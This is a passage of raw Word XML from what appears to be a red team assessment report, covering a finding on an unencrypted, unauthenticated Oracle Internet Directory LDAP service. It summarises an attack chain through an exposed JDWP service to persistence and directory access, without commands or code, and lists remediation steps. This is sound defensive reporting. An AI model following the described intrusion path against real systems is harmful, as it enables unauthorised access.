          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Disable or tightly control anonymous </w:t>
      </w:r>
      <w:r w:rsidR="006F5C7A" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">connections to </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t>Oracle Internet Directory (OID)</w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F17FAA" w14:textId="6E1D0CE5" w:rsidR="00F62DB6" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Restrict the attributes and objects returned by </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle Internet Directory (OID) LDAP </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>queries to only what is necessary for legitimate business needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAA5DB8" w14:textId="7455EBE0" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Remove or obfuscate sensitive connection details from </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle Internet Directory (OID) </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>directory entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B58C86A" w14:textId="1F46E2B8" w:rsidR="00F62DB6" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Limit access to the </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle Internet Directory (OID) </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>service to only trusted hosts and applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DA1A56" w14:textId="75B3EF0B" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Implement firewall rules to restrict unnecessary internal access</w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to Oracle Internet Directory (OID)</w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A6A4D" w14:textId="12E66CEA" w:rsidR="00F62DB6" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Enable logging for </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle Internet Directory (OID) </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>queries and monitor for unusual or unauthenticated access attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22311B74" w14:textId="2CED007C" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Integrate </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle Internet Directory (OID) </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>with SIEM for real-time alerting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D0A17B" w14:textId="1B3866B9" w:rsidR="00F62DB6" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Regularly audit </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle Internet Directory (OID) </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>directory permissions and access controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6EC2F" w14:textId="5DC97A3B" w:rsidR="00B71B0E" w:rsidRPr="001019D3" w:rsidRDefault="00B71B0E" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Test for anonymous access and information disclosure </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">on Oracle Internet Directory (OID) </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">by doing </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00F62DB6" w:rsidRPr="001019D3">
        <w:t>egular</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> security assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923747B" w14:textId="5E2EC301" w:rsidR="00777111" w:rsidRPr="001019D3" w:rsidRDefault="00777111" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213093260 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.10</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> for recommendations about the unencrypted Oracle Internet Directory (OID)</w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56885BD7" w14:textId="3CC54EA0" w:rsidR="00E7655F" w:rsidRPr="001019D3" w:rsidRDefault="00E7655F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2B99ED" w14:textId="0D3B4758" w:rsidR="00975DBE" w:rsidRPr="001019D3" w:rsidRDefault="00B44CC1" w:rsidP="00975DBE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
        <w:ind w:left="734" w:hanging="734"/>
      </w:pPr>
      <w:bookmarkStart w:id="207" w:name="_Toc212654665"/>
      <w:bookmarkStart w:id="208" w:name="_Ref213093260"/>
      <w:bookmarkStart w:id="209" w:name="_Ref213099581"/>
      <w:bookmarkStart w:id="210" w:name="_Toc213253576"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unencrypted</w:t>
      </w:r>
      <w:r w:rsidR="00975DBE" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
      <w:bookmarkEnd w:id="208"/>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:t>Oracle Internet Directory (</w:t>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>OID)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> LDAP service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>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2"/>
        <w:gridCol w:w="2416"/>
        <w:gridCol w:w="1916"/>
        <w:gridCol w:w="3106"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A47F30" w:rsidRPr="001019D3" w14:paraId="1782F0AD" w14:textId="77777777" w:rsidTr="00FB2591">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F9A7268" w14:textId="77777777" w:rsidR="00A47F30" w:rsidRPr="001019D3" w:rsidRDefault="00A47F30" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5323C9E2" w14:textId="77777777" w:rsidR="00A47F30" w:rsidRPr="001019D3" w:rsidRDefault="00A47F30" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2873" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F04D598" w14:textId="77777777" w:rsidR="00A47F30" w:rsidRPr="001019D3" w:rsidRDefault="00A47F30" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB2591" w:rsidRPr="001019D3" w14:paraId="1D9D438E" w14:textId="77777777" w:rsidTr="00FB2591">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1557E921" w14:textId="1BF0BC02" w:rsidR="00FB2591" w:rsidRPr="001019D3" w:rsidRDefault="00FB2591" w:rsidP="00FB2591">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68974704" w14:textId="569CB268" w:rsidR="00FB2591" w:rsidRPr="001019D3" w:rsidRDefault="00FB2591" w:rsidP="00FB2591">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oracle Internet Directory (OID)</w:t>
            </w:r>
            <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
              <w:t xml:space="preserve"> LDAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="36068A01" w14:textId="77777777" w:rsidR="006A00FB" w:rsidRPr="001019D3" w:rsidRDefault="006A00FB" w:rsidP="00840B5A">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TA-0007</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37B9D856" w14:textId="101FEA18" w:rsidR="00FB2591" w:rsidRPr="001019D3" w:rsidRDefault="006A00FB" w:rsidP="00840B5A">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1777" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38A557B4" w14:textId="77777777" w:rsidR="00075E80" w:rsidRPr="001019D3" w:rsidRDefault="00075E80" w:rsidP="00075E80">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA42ED4" w14:textId="3A226251" w:rsidR="00075E80" w:rsidRPr="001019D3" w:rsidRDefault="00075E80" w:rsidP="00075E80">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remote Services</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="644747E0" w14:textId="4D87E395" w:rsidR="00075E80" w:rsidRPr="001019D3" w:rsidRDefault="00075E80" w:rsidP="00075E80">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AC9F01F" w14:textId="4C6DDFE5" w:rsidR="00CA24F1" w:rsidRPr="001019D3" w:rsidRDefault="00CA24F1" w:rsidP="00FB2591">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FC2273" w14:textId="5D2D8E05" w:rsidR="00FB2591" w:rsidRPr="001019D3" w:rsidRDefault="00FB2591" w:rsidP="00FB2591">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Having an interactive shell on a WebLogic or Tomcat server by exploiting the exposed JDWP service (see </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212741027 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error! Reference source not found.</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">) and having establish persistence with the compromised service user accounts (see </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref209791354 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.2</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>) and performing local reconnaissance on the hosts (</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212824973 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.3</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>), the Red Team gained access to the Oracle Internet Directory (OID) service whose connection information was found in a configuration file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F68402" w14:textId="3512DBE8" w:rsidR="00FB2591" w:rsidRPr="001019D3" w:rsidRDefault="00FB2591" w:rsidP="00777111">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">While this has already been discovered in the previous finding (see </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213092634 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.9</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>), it was identified that the exposed OID serves the connection without encryption and does not require authentication. This means that an attacker who is able to intercept communications between the server and a user could discover the entire information that has been exchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F3F0D8" w14:textId="3B7435A6" w:rsidR="00FB2591" w:rsidRPr="001019D3" w:rsidRDefault="00FB2591" w:rsidP="00777111">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701238C" w14:textId="72CE7C20" w:rsidR="00777111" w:rsidRPr="001019D3" w:rsidRDefault="00777111" w:rsidP="00777111">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following shows a successful connection and network interception using the unencrypted Oracle Internet Directory (OID) protocol, which has the same format as the LDAP protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D82B1D6" w14:textId="79330FD9" w:rsidR="00E716E5" w:rsidRPr="001019D3" w:rsidRDefault="00E716E5" w:rsidP="00777111">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C96B04" wp14:editId="43FCF29D">
            <wp:extent cx="4394200" cy="2138666"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20013441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4165" name="Picture 3"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410632" cy="2146663"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41808ED5" w14:textId="06FA2C9E" w:rsidR="00CA24F1" w:rsidRPr="001019D3" w:rsidRDefault="00E716E5" w:rsidP="00B84673">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="_Toc213253807"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00777111" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Cleartext </w:t>
      </w:r>
      <w:r w:rsidR="00777111" w:rsidRPr="001019D3">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">esponse from the </w:t>
      </w:r>
      <w:r w:rsidR="00777111" w:rsidRPr="001019D3">
        <w:t>OID.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w14:paraId="256226F5" w14:textId="5874859E" w:rsidR="00E716E5" w:rsidRPr="001019D3" w:rsidRDefault="00E716E5" w:rsidP="00E716E5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 05/06/2025 5:37 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110B58F" w14:textId="616DADF0" w:rsidR="004C0F72" w:rsidRPr="001019D3" w:rsidRDefault="004C0F72" w:rsidP="00B84673">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The affected server running the unencrypted Oracle Internet Directory (OID) service can be found in annex</w:t>
      </w:r>
      <w:r w:rsidR="00B84673" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B84673" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B84673" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213093980 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00B84673" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.9</w:t>
      </w:r>
      <w:r w:rsidR="00B84673" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DD5F83" w14:textId="361E973A" w:rsidR="00CA24F1" w:rsidRPr="001019D3" w:rsidRDefault="00CA24F1" w:rsidP="00777111">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Recommendation</w:t>
      </w:r>
      <w:r w:rsidR="004C0F72" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35096071" w14:textId="7883C3FF" w:rsidR="00777111" w:rsidRPr="001019D3" w:rsidRDefault="00B84673" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
